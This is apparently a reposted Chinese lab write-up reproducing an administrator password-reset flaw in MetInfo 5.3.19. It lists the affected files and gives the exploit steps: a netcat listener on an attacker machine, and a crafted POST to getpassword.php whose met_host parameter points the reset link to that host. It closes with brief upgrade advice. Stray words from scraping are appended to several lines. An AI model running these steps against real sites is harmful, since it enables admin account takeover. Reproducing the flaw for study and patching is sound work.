Metinfo 5.3.19管理员密码重置漏洞php
操做系统:Windows 10专业版 kali linuxhtml
网站环境:UPUPW 5.3linux
使用工具:burpsuite 1.7 beta浏览器
漏洞分析
#密码重置过程当中验证不严工具
#漏洞涉及到的几个文件分别是:优化
admin/admin/getpassword.php网站
include/common.inc.phpui
include/jmail.phpspa
include/export.func.php操作系统
安装(请忽略我用QQ浏览器)
upupw默认数据帐户密码:root--root
漏洞复现
登录localhost/metinfo/admin点击忘记密码
用burp抓包
在kali虚拟机上监听80端口
nc -lvvp 80
kali机器上IP为192.168.43.15
在burp repeater中构造http请求发送
POST /metinfo/admin/admin/getpassword.php?met_host=192.168.43.15
这时候在咱们kali监听的80端口监听到了密码重置的连接
打开连接进入设置密码界面
我这里好几回没有监听到不知到是怎末回事重启了kali就能够了(计算机玄学吧有时候得信)
漏洞建议:
升级CMS版本
二次开发中优化登录代码避免逻辑错误
原文出处:https://www.cnblogs.com/xiaoyunxiaogang/p/10927652.html